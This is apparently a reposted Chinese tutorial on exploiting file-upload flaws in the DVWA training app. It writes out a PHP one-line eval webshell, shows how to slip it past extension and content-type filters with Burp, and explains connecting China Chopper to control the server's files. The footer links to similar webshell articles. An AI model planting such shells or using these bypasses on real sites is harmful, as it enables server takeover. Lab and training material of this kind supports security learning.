上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

这篇具有很好参考价值的文章主要介绍了上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1、常见漏洞分类

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 2、常见验证手段

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 可抓包后修改扩展名为图片格式,再上传可绕过验证。如:

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

可以修改php文件后缀为其他,再上传。如test.php.xxx

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用) 可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。

 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 客户端验证绕过的方法有:

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 例:上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

3、一句话木马

1)木马分为大马、小马和一句话木马:

      小马:文件体积小、上传文件、文件修改、文件管理

      大马:文件体积较大、功能齐全、能够提权、操作数据库等(不推荐)

     一句话木马:短小精悍、功能强大、隐蔽性好、客户端直接管理(主流)

2)中国菜刀工具使用:

百度下载工具——运行caidao.exe

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 这里以php为例
首先我们先将php一句话木马上传到目标服务器中,用菜刀去尝试连接

新建一个php文档,输入一句话木马:<?php @eval($_POST['x']);?> 保存为10.php。

注意:x为菜刀连接时密码,可修改为其他字符。

再将10.php重命名为10.php.jpeg。(目标网站过滤上传jpeg和png文件)

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 打开burp软件,开启捕获。

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 再选择10.php.jpeg文件上传

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 将文件名修改为10.php,上传文件类型仍然是image/jpeg,可绕过上传过滤。

brup中关闭捕获。

dvwa中可见上传成功了!

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

 ../../表示当前路径的上一级、上一级。

复制上传成功后的路径,粘贴到当前浏览器地址的上一级、上一级得到完整路径。

即:http://ip/hackable/uploads/10.php

复制此路径,在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

再右键此站点,选择要执行的命令——选文件管理,可操作此服务器上所有文件。

上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用) 

 文章来源地址https://www.toymoban.com/news/detail-505570.html

 

到了这里,关于上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 你真的了解一句话木马吗?

    目录 一、前言: 二、什么是一句话木马: 三、常见的一句话木马: 木马讲解: 1、$_POST[cmd] 2、eval() 3、\\\"@\\\" 4、脉络梳理 四、可用于条件竞争的一句话木马: 木马讲解: 1、fopen() 2、fputs()  3、脉络梳理 五、图片马 1、什么是图片马: 2、.htaccess 3、木马图片 4.   .user.ini扩展

    2024年02月04日
    浏览(46)
  • 渗透干货|史上最全一句话木马

    PHP //可执行命令一句话 普通一句话 PHP系列 过狗一句话 【----帮助网安学习,以下所有学习资料文末免费领!----】 几个变性的php–过防火墙 过狗效果都不错: 密码-7 phpv9 高版本拿shell ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样 不过我认为能

    2024年04月25日
    浏览(44)
  • java安全——jsp一句话木马

    提示:以下是本篇文章正文内容,下面案例可供参考 http://localhost:8003/index.jsp?cmd=whoami 不会回显执行的结果只能在后台打印一个地址,常用来反弹shell 代码如下(示例):

    2024年02月11日
    浏览(46)
  • 一句话木马攻击复现:揭示黑客入侵的实战过程

    这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。 准备环境 OWASP虚拟机 xfp 7与xshell 7 ​  DVWA系统默认的账号密码均为:admin/admin  ​ 攻击payload 这个命令的目的是在服务器上创建一个名为 shell.php 的文件,其中包含 PHP 代码。让我们逐步分析该命令:

    2024年02月11日
    浏览(51)
  • PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示

    一句话木马如下,利用文件上传漏洞,往目标网站上传该木马,即可获取和控制整个网站主机目录 @符号 @符号表示后面的语句即使执行错误,也不报错。 eval()函数 eval()函数的作用是把括号内的字符串全部当作php代码来执行。 $_POST[\\\'hack\\\'] post方法是html中form标签中的方法,在页

    2023年04月09日
    浏览(31)
  • 一句话生成长视频

    前段时间,我曾经介绍过Imagen Video模型。它能够在输入一句话中,生成5~6秒的视频。而且由于采用了“空间高分辨率模型”和“时域高分辨率模型”的级联模型,它能够清晰度在1280×768的高清视频。具体的介绍可以回看我之前写的文章: 短视频模型Imagen Video:艺术和3D建模大

    2023年04月09日
    浏览(40)
  • 一句话画出动漫效果

     链接: AI Comic Factory - a Hugging Face Space by jbilcke-hf Discover amazing ML apps made by the community https://huggingface.co/spaces/jbilcke-hf/ai-comic-factory 选择类型: Japanese  输入提示词: 效果如下:

    2024年02月10日
    浏览(55)
  • 解封ChatGPT我只用了一句话

    文章前言 ChatGPT作为一个AI语言模型可以帮助使用者生成各种各样的文字内容,目前已被广泛应用于各种语言任务中,例如:文本生成、机器翻译、问答系统等,基于保障使用者权益和维护良好的价值观,官方限制ChatGPT不能回答不当言论(攻击或侮辱性)、敏感内容和带有偏见的

    2024年02月16日
    浏览(38)
  • 一句话解释什么是出口IP

    出口 IP 是指从本地网络连接到公共互联网时所使用的 IP 地址。这个 IP 地址是由 Internet 服务提供商(ISP)分配给你的,它可以用来标识你的网络流量的来源。如果你使用的是 NAT(网络地址转换)技术,则在 NAT 设备内部会进行地址转换,使得多个设备可以共享同一个公共 I

    2024年02月08日
    浏览(40)
  • 一句话介绍大数据各种名词及其特点

    大数据 :传统PC无法处理的。数据大、数据类型繁多、处理速度快、价值密度低。 Hadoop :能够对大数据进行分布式处理的软件框架、这种处理具有高效、可靠、可伸缩的特点。Hadoop的特点:高效率、高可靠、高容错、高可拓展。成本低、Linux运行支持多语言。 SSH :建立在应用

    2024年02月03日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包